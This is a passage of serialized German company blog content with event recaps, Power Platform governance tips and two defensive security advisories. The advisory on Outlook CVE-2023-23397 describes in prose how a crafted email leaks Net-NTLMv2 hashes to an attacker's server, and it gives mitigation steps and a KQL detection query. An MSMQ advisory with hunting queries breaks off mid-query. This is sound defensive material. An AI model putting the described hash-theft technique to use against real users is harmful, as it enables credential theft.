Erfolg. Nahzu 400 Teilnehmer aus der ganzen Welt kamen zu einer der wichtigsten europäischen Technologiekonferenzen für Hardcore-Ingenieure zu ConfigMgr, Intune, Microsoft Security, Azure AD, PowerShell und Azure Virtual Desktop zusammen. Exzellente Sessions, großartige Redner und eine erstklassige Location.",[353,7701,7702],{},"Fazit: Mega cooles Event!",[353,7704,7705],{},"Ein großes Lob geht an das Orga-Team rund um Mirko Colemberg. Und natürlich ein Dankeschön an alle unsere interessanten Gesprächspartner.",[353,7707,7708],{},"Wir sehen uns bald wieder!",[353,7710,7711,7712,7717],{},"Vielleicht schon nächste Woche auf dem ",[374,7713,7716],{"href":7714,"rel":7715},"https://www.identitysummit.cloud/",[378],"Cloud Identity Summit"," in Bonn?",{"title":402,"searchDepth":403,"depth":403,"links":7719},[],{"categories":7721,"blogtitlepic":7722,"socialimg":7723,"customExcerpt":7724},[410],"20220913-wpninja-summit-collage","/blog/heads/20220913-wpninja-summit-collage.jpg","Wir waren in diesem Jahr erneut Sponsor des Workplace Ninja Summit. Die Veranstaltung ist eine der wichtigsten europäischen Technologiekonferenzen für Hardcore-Techniker in den Bereichen ConfigMgr, Intune, Microsoft Security, Azure AD, PowerShell und Azure Virtual Desktop mit dem Ziel, Workplace-Experten zusammenzubringen, um ihr Wissen zu teilen und gemeinsam zu lernen.","2022-09-14","/posts/2022-09-13-workplace-ninja-summit-recap",{"title":7693,"description":7699},"posts/2022-09-13-workplace-ninja-summit-recap",[410,1562,7730],"WP Ninja Summit","9aQ2CUbID54CiAc6zdPfXtHZ1A2NEAwrcGLcp9Bg2L8",{"id":7733,"title":7734,"author":7735,"body":7736,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":7860,"moment":7865,"navigation":415,"path":7866,"seo":7867,"stem":7868,"tags":7869,"webcast":406,"__hash__":7871},"content_de/posts/2022-10-04-power-platform-governance.md","Die Bedeutung von Governance für die Einführung der Power Platform",[197],{"type":350,"value":7737,"toc":7849},[7738,7745,7748,7751,7755,7758,7775,7779,7782,7793,7796,7800,7803,7807,7810,7814,7817,7820,7823,7826],[2548,7739,7741,7742,7744],{"id":7740},"warum-sollte-man-einen-governance-plan-erstellen","Warum sollte man einen ",[2970,7743],{},"Governance Plan erstellen?",[353,7746,7747],{},"In der Standardkonfiguration der Power Platform hat jeder Nutzer:in mindestens Zugriff auf Power Automate und Power Apps und im Fall von Power BI auch auf Power BI in der kostenlosen Variante. Für Power Automate und Power Apps bedeutet das, dass jeder Nutzer:in Flows und Apps erstellen kann. Dabei kann jeder Standardkonnektor verwendet werden. Da Konnektoren auch dazu dienen, um Verbindungen zu Cloud-Diensten von Drittanbietern herzustellen, können hier gegebenenfalls Flows oder Apps erstellt werden, die Daten an nicht freigegebene Dienste übertragen. Wenn im Tenant Premiumlizenzen verfügbar sind, kann jeder Nutzer neue Umgebungen erstellen und ist Administrator in der neu erstellten Umgebung. Wenn keine Premium-Lizenzen verfügbar sind, kann ein Nutzer:in eine 90-tägige Testphase starten, um Premium-Funktionen in Flows und Apps zu testen. Das kann schnell dazu führen, dass geschäftskritische Power Apps plötzlich auf Premium-Funktionen basieren und eine Premium-Lizenzierung erfordern, auch wenn die Lizenzierungsstrategie dies nicht vorsieht.",[353,7749,7750],{},"Aufgrund der \"Power BI Free\" Lizenz ist die Einstiegshürde bei Power BI etwas höher, aber Power BI Pro ist Bestandteil eines E5-Plans und persönliche Berichte können bereits mit einer Free-Lizenz erstellt werden. Es lohnt sich also, einen genaueren Blick auf die Power BI Konfiguration zu werfen. Insbesondere wenn in Power BI vertrauliche Unternehmensdaten aufbereitet werden. Power BI Free-Nutzer:innen können beispielsweise auch ein lokales Daten-Gateway installieren und so alle denkbaren Unternehmensinformationen an den Dienst übertragen und mit einer Pro-Lizenz sogar mit Kollegen teilen. Wenn diese Informationen normalerweise mit Sensitivity Labels und Microsoft Information Protection klassifiziert und geschützt werden, kann die gleiche Technik auch zum Schutz von Power BI-Berichten verwendet werden.",[2548,7752,7754],{"id":7753},"welche-governance-relevanten-einstellungen-gibt-es","Welche Governance relevanten Einstellungen gibt es?",[353,7756,7757],{},"Diese Frage kann nicht einheitlich für die Power Platform beantwortet werden: Je nach Dienst sind unterschiedliche Einstellungen möglich. Für den Anfang lohnt es sich, grundsätzlich auf die folgenden Governance- und Compliance-Themen einzugehen und die entsprechenden Einstellungen vorzunehmen:",[367,7759,7760,7763,7766,7769,7772],{},[370,7761,7762],{},"Zugriff auf die Power Platform - Lizenzen und Trials",[370,7764,7765],{},"Wer erstellt Environments und Workspaces?",[370,7767,7768],{},"Data Loss Prevention - Welche Konnektoren dürfen verwendet werden?",[370,7770,7771],{},"On-Premises Data Gateways - Wer darf sie installieren und nutzen?",[370,7773,7774],{},"Microsoft Information Protection - Planung der Integration in Power BI",[2548,7776,7778],{"id":7777},"welche-organisatorischen-tools-bietet-microsoft","Welche organisatorischen Tools bietet Microsoft?",[353,7780,7781],{},"Microsoft stellt mittlerweile einige Tools für den Betrieb und die Einführung der Power Platform zur Verfügung, die zu einem sicheren und effektiven Betrieb von Power Platform beitragen können. Dazu gehören:",[367,7783,7784,7787,7790],{},[370,7785,7786],{},"Einführungsmodell der Power Platform",[370,7788,7789],{},"Power Platform Center of Excellence",[370,7791,7792],{},"Konzepte für das Application Lifecycle Management",[353,7794,7795],{},"Natürlich gelten die Empfehlungen nicht für jede Organisation gleichermaßen, aber sie können als gute Grundlage dienen.",[2548,7797,7799],{"id":7798},"womit-anfangen","Womit anfangen?",[353,7801,7802],{},"Für ein Governance-Konzept für die Power Platform müssen organisatorische und technische Themen berücksichtigt werden. Im Folgenden erhalten Sie einen Überblick über die Themen, die zu berücksichtigen sind",[629,7804,7806],{"id":7805},"organisatorisch","Organisatorisch",[353,7808,7809],{},"Grundsätzlich ist zu entscheiden, in welchem Umfang die Power Platform genutzt werden soll, ob Testlizenzen von Premiumfunktionen verwendet werden dürfen und welche Dienste von Drittanbietern über die Power Platform mit dem eigenen Tenant verbunden werden dürfen. Für die Einführung der Power Platform-Dienste ist es hilfreich, sich die verschiedenen organisatorischen Bereitstellungsmodellen anzusehen. Wenn Premium-Lizenzen und damit Environments und Dataverse genutzt werden sollen, lohnt es sich, vorher eine Environment-Strategie zu entwickeln. Dürfen Apps und Flows abteilungsübergreifend oder sogar unternehmensweit eingesetzt werden, ist ein Application Lifecycle Management unerlässlich.",[629,7811,7813],{"id":7812},"technisch","Technisch",[353,7815,7816],{},"Für Power Automate und Power Apps kann ein erster Schritt in einer Governance-Strategie darin bestehen, festzulegen, in welchem Umfang die Dienste genutzt werden sollen und welche Konnektoren im Unternehmenskontext verwendet werden dürfen. Gleiches gilt für die Erstellung von Environments und die Installation von On-Premises Data Gateways.",[353,7818,7819],{},"Im Falle von Power BI muss entschieden werden, ob Benutzer:innen mit Pro-Lizenzen eigenständig neue Workspaces für die gemeinsame Entwicklung und Nutzung von Reports und Dashboards erstellen dürfen. Falls nicht, ist dies ein Thema für organisatorische Governance-Fragen. Zusätzliche Einstellungen können über die administrativen Power BI-Einstellungen vorgenommen werden, die bei den organisatorischen Governance Themen berücksichtigt werden sollten und diese auch unterstützen können.",[353,7821,7822],{},"Die Empfehlung lautet daher, zunächst die Nutzung der Power Platform und möglicherweise auch bereits bestehende Anforderungen aus dem Business zu prüfen und eine entsprechende Governance-Strategie zu entwickeln. Die Konfiguration der Power Platform muss dann im Einklang mit der Governance-Strategie angepasst werden. Darüber hinaus kann es sinnvoll sein, die Bereitstellung der Power Platform mit Adoption und anderen Tools wie dem Center of Excellence zu begleiten.",[2548,7824,7825],{"id":7117},"Weiterführende Links:",[367,7827,7828,7835,7842],{},[370,7829,7830],{},[374,7831,7834],{"href":7832,"rel":7833},"https://docs.microsoft.com/en-us/power-platform/guidance/adoption/maturity-model",[378],"Power Platform adoption maturity model",[370,7836,7837],{},[374,7838,7841],{"href":7839,"rel":7840},"https://docs.microsoft.com/en-us/power-platform/guidance/coe/starter-kit",[378],"Microsoft Power Platform Center of Excellence Kit",[370,7843,7844],{},[374,7845,7848],{"href":7846,"rel":7847},"https://docs.microsoft.com/en-us/power-platform/alm/",[378],"Application lifecycle management (ALM) with Microsoft Power Platform",{"title":402,"searchDepth":403,"depth":403,"links":7850},[7851,7853,7854,7855,7859],{"id":7740,"depth":403,"text":7852},"Warum sollte man einen Governance Plan erstellen?",{"id":7753,"depth":403,"text":7754},{"id":7777,"depth":403,"text":7778},{"id":7798,"depth":403,"text":7799,"children":7856},[7857,7858],{"id":7805,"depth":704,"text":7806},{"id":7812,"depth":704,"text":7813},{"id":7117,"depth":403,"text":7825},{"categories":7861,"blogtitlepic":7862,"socialimg":7863,"customExcerpt":7864},[534],"head-power-platform-governance","/blog/heads/head-power-platform-governance.jpg","Mit der Power Platform stellt Microsoft jedem Microsoft 365-Nutzer Dienste zur Verfügung, die es ermöglichen, persönliche und abteilungsspezifische Anforderungen an Prozessautomatisierung, App-Entwicklung und Business Intelligence in einer Low-Code-Umgebung umzusetzen. Zielgruppe für die Dienste sind somit die Nutzer:innen selbst, die ihre Anforderungen definieren und auch selbstständig umsetzen können. Die Standardkonfiguration der Power Platform in einem Microsoft 365-Tenant ist nach oben offen. Dadurch können die Nutzer:innen die Power Platform-Dienste ohne Einschränkungen nutzen, aber möglicherweise fehlen hilfreiche Leitplanken oder Einschränkungen, um Compliance-Anforderungen zu erfüllen. Es ist daher sinnvoll, sich vor der Einführung der Power Platform Gedanken über die Governance-Regeln und -Prozesse zu machen.","2022-10-04","/posts/2022-10-04-power-platform-governance",{"title":7734,"description":402},"posts/2022-10-04-power-platform-governance",[534,7870,1408],"Power Platform","LX020Y97M0_ck_5hBzpSEh8OEOCaPWcqdtUlpTeNMMw",{"id":7873,"title":7874,"author":7875,"body":7876,"cta":3,"description":7880,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":7895,"moment":7903,"navigation":415,"path":7904,"seo":7905,"stem":7906,"tags":7907,"webcast":406,"__hash__":7909},"content_de/posts/2022-10-18-csoc-managed-xdr-solution.md","glueckkanja erhält Microsoft Verified Managed XDR Solution Status",[191],{"type":350,"value":7877,"toc":7893},[7878,7881,7887,7890],[353,7879,7880],{},"Yeah! Als einer von derzeit nur drei Partnern weltweit hat glueckkanja den Status der Microsoft Verified Managed Extended Detection and Response (MXDR) Lösung erhalten. Diese Auszeichnung ist der beste Beweis für unser zuverlässiges Angebot an MXDR Services, insbesondere für unser Security Operation Center (SOC) mit 24/7/365 proaktiven Hunting-, Monitoring- und Response-Funktionen, die auf einer nahtlosen Integration mit der Microsoft Security Plattform basieren. Diese Lösung kombiniert von Experten geschulte Technologie mit von Menschen betreuten Diensten und wurde von Microsoft-Ingenieuren geprüft.",[7882,7883],"v-img",{":img":7884,":alt":7885,":cloudinary":7391,"img-src-sets":7886},"quote.img","quote.alt","quote",[353,7888,7889],{},"„Angesichts der zunehmenden bösartigen Angriffe wissen wir, dass Sicherheit für unsere Kunden an erster Stelle steht. Deshalb freue ich mich, dass glueckkanja den Status Microsoft Verified: Managed Extended Detection and Response Status erhalten hat. Die Lösung von glueckkanja ist eng in Microsoft 365 Defender und Microsoft Sentinel integriert und wurde von Microsoft Security Engineering verifiziert, um sicherzustellen, dass sie das gesamte Microsoft Security Portfolio abdeckt.\" – Rob Lefferts, Corporate Vice President, Threat Protection, Microsoft",[353,7891,7892],{},"glueckkanja AG ist Teil der Microsoft Intelligent Security Association (MISA). \"Die Microsoft Intelligent Security Association setzt sich aus einigen der vertrauenswürdigsten und zuverlässigsten Sicherheitsunternehmen der Welt zusammen\", sagt Maria Thomson, Microsoft Intelligent Security Association Lead. \"Unsere Mitglieder teilen Microsofts Engagement für die Zusammenarbeit innerhalb der Cybersicherheits-Community, um die Fähigkeit unserer Kunden zu verbessern, Sicherheitsbedrohungen schneller vorherzusagen, zu erkennen und darauf zu reagieren. Wir freuen uns sehr, die MXDR-Lösung von glueckkanja AG ins MISA-Portfolio aufzunehmen.",{"title":402,"searchDepth":403,"depth":403,"links":7894},[],{"DISABLEDtitleClass":7896,"categories":7897,"blogtitlepic":7898,"socialimg":7899,"customExcerpt":7900,"quote":7901},"h2-font-size",[1117],"head-mxdr-verification","/blog/heads/head-mxdr-verification.jpg","glueckkanja erhält den Microsoft Verified Managed XDR Solution Status als weltweit einer von drei Partnern. Diese Auszeichnung zeigt, dass wir zuverlässige MXDR Services anbieten, insbesondere unseres Security Operation Center (SOC) mit 24/7/365 proaktiven Hunting-, Monitoring- und Response-Funktionen, die auf einer nahtlosen Integration mit der Microsoft Security Platform basieren.",{"img":7902,"alt":164},"/blog/pics/quote-jan-geisbauer.png","2022-10-18","/posts/2022-10-18-csoc-managed-xdr-solution",{"title":7874,"description":7880},"posts/2022-10-18-csoc-managed-xdr-solution",[1117,4707,7908],"MXDR","xCE0O6m50crFEGLoBbhJJiLpH4hJ6PUf-5KTgejRjIw",{"id":7911,"title":7912,"author":7913,"body":7914,"cta":3,"description":7918,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":8011,"moment":8016,"navigation":415,"path":8017,"seo":8018,"stem":8019,"tags":8020,"webcast":406,"__hash__":8021},"content_de/posts/2023-02-24-cloud-security-day.md","Sind Sie sicher, dass Sie sicher sind?",[191],{"type":350,"value":7915,"toc":8009},[7916,7919,7928,7935,7958,7965,7973,7979,7982,7985],[353,7917,7918],{},"glueckkanja lud am 17. Februar zum Cloud Security Day 2023 ins Microsoft HQ in München ein. Der Fokus lag dabei ganz auf der Cyber Security und dem Schutz von Unternehmen. In zahlreichen Sessions und Diskussionen lieferten hochkarätige Speaker wertvolle Erkenntnisse und nützliche Tipps.",[353,7920,7921,7922,7927],{},"Den Anfang machte ",[374,7923,7926],{"href":7924,"rel":7925},"https://www.linkedin.com/in/helgeschroda/",[378],"Helge Schroda",", Lead Cyber Security bei Microsoft, mit seiner Session \"Geschäftsrisiken durch Cyberangriffe: Wie antworten wir auf die Bedrohung?\". Er betonte die Veränderungen und Verschärfungen der Geschäftsrisiken durch Cyberangriffe und gab Unternehmen wertvolle Tipps, um sich effektiv dagegen zu schützen.",[353,7929,7930,7934],{},[374,7931,164],{"href":7932,"rel":7933},"https://www.linkedin.com/in/jangeisbauer/",[378],", Cyber Security Lead bei glueckkanja, stellte in seiner Session \"Die Sorgen eines CISO: Sind wir sicher genug?\" die drängende Frage, ob Sicherheit überhaupt messbar ist und regte zum Nachdenken an.",[353,7936,7937,7941,7942,7946,7947,7951,7952,7957],{},[374,7938,260],{"href":7939,"rel":7940},"https://www.linkedin.com/in/thomasnaunheim/",[378],", MVP und Cyber Security Architect bei glueckkanja, gab in seiner Session \"In Zero Trust We Trust: Moderne Security-Ansätze aus der Praxis\" praktische Anleitungen, wie Unternehmen die Anforderungen an eine moderne Infrastruktur effektiv umsetzen können. In der Session \"Defender vs. Sentinel\" diskutierte er zusammen mit ",[374,7943,186],{"href":7944,"rel":7945},"https://twitter.com/stephanwaelde",[378],", Lead Detection Engineer, und ",[374,7948,224],{"href":7949,"rel":7950},"https://www.linkedin.com/in/fabianbader/",[378],", MVP und Cyber Security Architect, die Unterschiede der beiden erstklassigen Security Solutions und welches System besser für Unternehmen geeignet ist. Außerdem zeigten ",[374,7953,7956],{"href":7954,"rel":7955},"https://www.linkedin.com/in/benedict-schmieder/",[378],"Benedict Schmieder",", Cyber Security Analyst, und Thomas Naunheim in der Session \"OT/IoT Security. Ganz Gallien? Nein!\", wie Unternehmen ihre OT-Umgebung mit Defender for IoT effektiv absichern und verwalten können.",[353,7959,7960,7964],{},[374,7961,54],{"href":7962,"rel":7963},"https://www.linkedin.com/in/oliver-kieselbach/",[378],", MVP und Lead Cloud Architect bei glueckkanja, präsentierte in seiner Session \"Windows Security: das zweitsicherste Betriebssystem der Welt\" die wichtigsten Funktionen von Windows und wie Unternehmen diese nutzen können, um ihre Security Posture zu verbessern.",[353,7966,7967,7968,7972],{},"Den krönenden Abschluss des Tages bildete ",[374,7969,265],{"href":7970,"rel":7971},"https://www.linkedin.com/in/florianstoeckl/",[378],", der Azure Lead bei glueckkanja, mit seinem Vortrag \"The Worst Case\". Er zeigte, was im Falle eines erfolgreichen Ransomware-Angriffs mit dem \"Azure Emergency Response Environments (AzERE)\" Blueprint in den ersten Minuten und Stunden zu tun ist.",[353,7974,7975,7976,456],{},"Insgesamt war der Cloud Security Day 2023 ein voller Erfolg und bot den Gästen und Speakern eine Plattform zum Netzwerken und Wissenstransfer. Die komplette Agenda des Tages findet sich ",[374,7977,1491],{"href":7978},"/de/security/cloud-security-day-2023",[353,7980,7981],{},"glueckkanja als Partner von Microsoft leistet einen wichtigen Beitrag zur Unterstützung von Unternehmen bei der Cyber Security und freut sich auf zukünftige Veranstaltungen.",[353,7983,7984],{},"Die nächste Veranstaltung zu diesem Thema \"Microsoft Cloud & Device Security Event\" findet am 21. März bei Microsoft statt. Wir sind vor Ort und freuen uns darauf, mit Ihnen über die neuesten Entwicklungen in diesem Bereich zu diskutieren. Melden Sie sich gerne an und besuchen Sie die Session von Jan Geisbauer, um weitere wertvolle Einblicke in die Welt der Cyber Security zu erhalten. Wir freuen uns darauf, Sie dort zu treffen!",[2559,7986,7992],{"className":7987},[7988,7989,7990,7991],"cta-list","d-inline-block","mr-3","mb-2",[374,7993,8005],{"role":7994,"className":7995,"dataText":8002,"href":8003,"type":8004},"button",[7996,7997,7998,7999,8000,8001],"cta","btn","w-100","w-lg-auto","btn-primary","vue-component","Weitere Informationen und Anmeldung","https://www.microsoft.com/de-de/events-de/cloud-device-security/default.aspx","Button",[7258,8006,8002],{"className":8007},[8008],"cta__text",{"title":402,"searchDepth":403,"depth":403,"links":8010},[],{"DISABLEDtitleClass":7896,"categories":8012,"blogtitlepic":8013,"socialimg":8014,"customExcerpt":8015},[410],"head-cloud-security-day","/blog/heads/head-cloud-security-day.jpg","glueckkanja veranstaltete den Cloud Security Day 2023 im Microsoft HQ in München. Die zahlreichen Sessions und Diskussionen drehten sich um das Thema Cyber Security und dem Schutz von Unternehmen. Hochkarätige Speaker wie Helge Schroda, Lead Cyber Security bei Microsoft, und Jan Geisbauer, Cyber Security Lead bei glueckkanja, boten wertvolle Einblicke in aktuelle Entwicklungen und gaben praxisnahe Tipps für ein effektives Schutzkonzept.","2023-02-24","/posts/2023-02-24-cloud-security-day",{"title":7912,"description":7918},"posts/2023-02-24-cloud-security-day",[1117,1562,4707,422],"vozpUl3yeuLBv3SBXcLrM0iE1VRvSCnQGgMlLoJ_5jA",{"id":8023,"title":8024,"author":8025,"body":8026,"cta":3,"description":8030,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":8199,"moment":8204,"navigation":415,"path":8205,"seo":8206,"stem":8207,"tags":8208,"webcast":406,"__hash__":8210},"content_de/posts/2023-03-16-outlook-sicherheitsluecke.md","Zero-Day-Exploit in Outlook ermöglicht Diebstahl von Net-NTLMv2-Hash",[31,224],{"type":350,"value":8027,"toc":8196},[8028,8031,8034,8042,8045,8048,8055,8062,8069,8076,8079,8082,8088,8096,8099,8108,8111,8168,8172,8174],[353,8029,8030],{},"Microsoft hat am Dienstag bestätigt, dass eine kritische Outlook-Sicherheitslücke, die mit 9,8 von maximal 10 Punkten bewertet wurde, bereits auf breiter Front (Zero-Day) ausgenutzt wird. Das Gefährliche an diesem Exploit ist, dass er ausgeführt wird, sobald eine bösartigen E-Mail in Outlook zugestellt ist. Die Mail muss nicht erst geöffnet werden, um die Schwachstelle auszunutzen. Es ist also keine zusätzliche Benutzeraktivität notwendig. Mit einer manipulierten E-Mail kann ein Angreifer einen Server unter seiner Kontrolle gezielt ansprechen und dadurch den Net-NTLMv2-Hash des angemeldeten Benutzers abgreifen. Die erbeuteten Informationen können dann für weitere Angriffe gegen die on-premises Infrastruktur des Anwenders genutzt werden.",[353,8032,8033],{},"Wichtigste Maßnahme zur Behebung dieses Exploits ist die sofortige Aktualsierung des Office Pakets. Folgende Update-Maßnahmen sind möglich:",[367,8035,8036,8039],{},[370,8037,8038],{},"Der Anwender prüft selbst in Office auf Updates: (Datei \\ Office Konto \\ Update Optionen > Jetzt aktualisieren)",[370,8040,8041],{},"In einer modernen Arbeitsplatzumgebung nutzen wir die Office Update Richtlinien. Office lässt sich dabei mittels Intune oder GPOs verwalten. Wir empfehlen die Verwendung der Deployment Deadline",[353,8043,8044],{},"Wir zeigen Ihnen, wie Sie die grundlegenden Einstellungen für ein schnelles Update der Office Applikationen mithilfe von Intune erreichen können. Diese Angaben sind nicht vollständig, sondern legen den Fokus auf das schnelle Installieren der Updates.",[353,8046,8047],{},"Im Intune Portal öffnen Sie den Bereich Geräte.",[353,8049,8050,8051],{},"Klicken Sie auf \"Configuration profiles\" und dann auf \"Create profile\".\nWählen Sie als Plattform „Windows 10 and later“ und als Typ „Templates“ aus.\nKlicken Sie dann auf \"Administrative Templates\".\n",[356,8052],{"alt":8053,"src":8054},"Configuration Profiles","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-01.png",[353,8056,8057,8058],{},"Vergeben Sie einen entsprechenden (beliebigen) Namen.\n",[356,8059],{"alt":8060,"src":8061},"Create Profiles","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-02.png",[353,8063,8064,8065],{},"In der Suchleiste geben Sie \"Update Deadline\" ein und klicken dann auf den Eintrag.\nAktivieren Sie die Einstellung und legen Sie eine Deadline fest. Dies kann eine Zahl in Tagen oder ein Zeitpunkt sein. Klicken Sie auf \"OK\" (und nicht auf \"Next\").\n",[356,8066],{"alt":8067,"src":8068},"Update Deadline","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-03.png",[353,8070,8071,8072],{},"Nun geben Sie „Enable Automatic Updates“ ein, klicken erneut auf den Eintrag und aktivieren diese Einstellung. Bestätigen Sie bitte mit \"OK\" und klicken Sie jetzt auf \"Next\".\n",[356,8073],{"alt":8074,"src":8075},"Enable Automatic Update","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-04.png",[353,8077,8078],{},"Scope Tags werden nicht benötigt und so können Sie diesen Reiter mit \"Next\" überspringen.",[353,8080,8081],{},"Als Assignment müssen Sie nun eine Gruppe auswählen, die alle Ihre zu aktualisierenden Windows Geräte beinhaltet.",[353,8083,8084],{},[356,8085],{"alt":8086,"src":8087},"Add Groups","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-05.png",[353,8089,8090,8091,8095],{},"Klicken Sie ein letztes Mal auf \"Next\" und es wird eine Zusammenfassung gezeigt.\n",[356,8092],{"alt":8093,"src":8094},"Review + Create","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-06.png","\nMit „Create“ wird das Intune Administrative Template erstellt und auf die Rechner der Gruppe angewandt.",[353,8097,8098],{},"Wenn Ihr Unternehmen nicht in der Lage ist, diese Sicherheitsupdates sofort auszurollen, oder wenn Sie bis zum erfolgreichen Rollout zusätzliche Maßnahmen ergreifen möchten, empfiehlt es sich, den ausgehenden Netzwerkverkehr zu Adressen im Internet für das SMB-Protokoll (TCP 445) mit einer Firewall oder über die VPN-Einstellungen zu blockieren. Dadurch wird verhindert, dass die Informationen zum Angreifer fließen.\nDies kann auch auf dem Endgerät selbst mit der Microsoft Defender Firewall geschehen.",[353,8100,8101,8102,8107],{},"Um zu überprüfen, ob Ihre Umgebung Ziel dieses Angriffs war, empfiehlt es sich das ",[374,8103,8106],{"href":8104,"rel":8105},"https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/",[378],"Skript"," von Microsoft auf Exchange Online oder Exchange on-premises auszuführen. Es prüft alle Mailboxen auf auffällige Nachrichten.",[353,8109,8110],{},"Wenn Sie Microsoft Defender for Endpoint im Einsatz haben, können Sie folgende Advanced Hunting Query nutzen, um entsprechende Netzwerkverbindungen in Ihrer Umgebung zu erkennen:",[2559,8112,8114,8115,8117,8118,8122,8123,8127,8131,1501,8134,8117,8136,8138,8139,1501,8143,8147,8148,1501,8151,8117,8153,8155,8156,1501,8159,8161,8162,8165,8166],{"style":8113},"background-color:#000000; font-family: 'Source Code Pro', 'Courier New', monospace; padding: 15px; color: #ffffff","\nDeviceNetworkEvents ",[2970,8116],{},"\n| ",[7258,8119,8121],{"style":8120},"color: #569CD6;","where"," Timestamp > ",[7258,8124,8126],{"style":8125},"color: #E6DB74;","ago(",[7258,8128,8130],{"style":8129},"color: #A6E22E;","30d",[7258,8132,8133],{"style":8125},")",[2970,8135],{},[7258,8137,8121],{"style":8120}," RemoteIPType == ",[7258,8140,8142],{"style":8141},"color: #D69D85;","\"Public\"",[7258,8144,8146],{"style":8145},"color: #F92672;","and"," RemotePort == ",[7258,8149,8150],{"style":8141},"\"445\"",[2970,8152],{},[7258,8154,8121],{"style":8120}," InitiatingProcessVersionInfoOriginalFileName =~ ",[7258,8157,8158],{"style":8141},"\"outlook.exe\"",[2970,8160],{},"\n  ",[7258,8163,8164],{"style":8145},"or"," InitiatingProcessParentFileName =~ ",[7258,8167,8158],{"style":8141},[2559,8169],{"className":8170},[2556,8171],"space-bottom-2",[2548,8173,7825],{"id":7117},[367,8175,8176,8182,8189],{},[370,8177,8178],{},[374,8179,8181],{"href":8104,"rel":8180},[378],"CVE-2023-23397 script",[370,8183,8184],{},[374,8185,8188],{"href":8186,"rel":8187},"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397",[378],"Microsoft Outlook Elevation of Privilege Vulnerability",[370,8190,8191],{},[374,8192,8195],{"href":8193,"rel":8194},"https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2023-exchange-server-security-updates/ba-p/3764224",[378],"Released: March 2023 Exchange Server Security Updates",{"title":402,"searchDepth":403,"depth":403,"links":8197},[8198],{"id":7117,"depth":403,"text":7825},{"DISABLEDtitleClass":7896,"categories":8200,"blogtitlepic":8201,"socialimg":8202,"customExcerpt":8203},[1117],"head-outlook-sicherheitsluecke","/blog/heads/head-outlook-sicherheitsluecke.jpg","Microsoft bestätigte eine kritische Sicherheitslücke in Outlook, die bereits von Angreifern genutzt wird, um den Net-NTLMv2-Hash von Benutzern zu stehlen. Einmal aktiviert durch eine bösartige E-Mail, erlaubt dieser Exploit weitere Angriffe auf das Opfer. Microsoft empfiehlt, das Office-Paket zu aktualisieren, um die Lücke zu beheben. Hierfür stehen verschiedene Update-Optionen zur Verfügung.","2023-03-16","/posts/2023-03-16-outlook-sicherheitsluecke",{"title":8024,"description":8030},"posts/2023-03-16-outlook-sicherheitsluecke",[1117,8209,4707],"Vulnerablity","wkz5Hb9Y5KP-iAndEaCs6vTw04voVvl-nEbxrDsPPiI",{"id":8212,"title":8213,"author":8214,"body":8215,"cta":3,"description":8219,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":8327,"moment":8335,"navigation":415,"path":8336,"seo":8337,"stem":8338,"tags":8339,"webcast":406,"__hash__":8340},"content_de/posts/2023-04-12-critical-vulnerability.md","Sicherheitslücke im MSMQ Service",[224],{"type":350,"value":8216,"toc":8324},[8217,8220,8223,8226,8229,8271,8274,8277,8301,8304,8308],[353,8218,8219],{},"Im Rahmen des gestrigen Microsoft Patch Tuesday wurde eine kritische Sicherheitslücke im \"Microsoft Message Queuing” Service behoben. Diese Sicherheitslücke erlaubt es einem Angreifer, Code auszuführen, ohne sich auf dem Zielsystem authentifizieren zu müssen.",[353,8221,8222],{},"Derzeit gibt es keinen öffentlich zugänglichen Exploit-Code, aber das wird sich in den nächsten Tagen schnell ändern. Das ist die Meinung von Microsoft und auch von den Sicherheitsforschern, die den Fehler gefunden haben.",[353,8224,8225],{},"Da dieses Windows Feature auch im Zusammenhang mit anderen Softwareprodukten (z. B. Exchange, SQL Server SSPI) installiert wird, sind möglicherweise mehr Systeme betroffen als vermutet. Schnelle Hilfe bietet der Microsoft-Patch oder, als Workaround, das Blockieren eingehender Netzwerkverbindungen zu TCP/1801.",[353,8227,8228],{},"Mit der folgenden Advanced Hunting Query können Sie Ihre eigene Umgebung nach verwundbaren Systemen durchsuchen.",[2559,8230,8114,8231,8117,8233,8122,8235,8237,8239,1501,8241,8117,8243,8245,8246,8249,8117,8251,8253,8254,1501,8257,8117,8259,8261,8262,1501,8265,8117,8267,8270],{"style":8113},[2970,8232],{},[7258,8234,8121],{"style":8120},[7258,8236,8126],{"style":8125},[7258,8238,8130],{"style":8129},[7258,8240,8133],{"style":8125},[2970,8242],{},[7258,8244,8121],{"style":8120}," ActionType == ",[7258,8247,8248],{"style":8141},"\"ListeningConnectionCreated\"",[2970,8250],{},[7258,8252,8121],{"style":8120}," LocalPort == ",[7258,8255,8256],{"style":8141},"\"1801\"",[2970,8258],{},[7258,8260,8121],{"style":8120}," InitiatingProcessVersionInfoOriginalFileName has ",[7258,8263,8264],{"style":8141},"\"MQSVC\"",[2970,8266],{},[7258,8268,8269],{"style":8120},"summarize by"," DeviceName\n",[2559,8272],{"className":8273},[2556,8171],[353,8275,8276],{},"Alternativ, falls der Netzwerkport geändert wurde, lautet die Abfrage:",[2559,8278,8279,8280,8117,8282,8122,8284,8286,8288,1501,8290,8117,8292,8294,8295,1501,8297,8117,8299,8270],{"style":8113},"\nDeviceProcessEvents ",[2970,8281],{},[7258,8283,8121],{"style":8120},[7258,8285,8126],{"style":8125},[7258,8287,8130],{"style":8129},[7258,8289,8133],{"style":8125},[2970,8291],{},[7258,8293,8121],{"style":8120}," ProcessVersionInfoOriginalFileName has 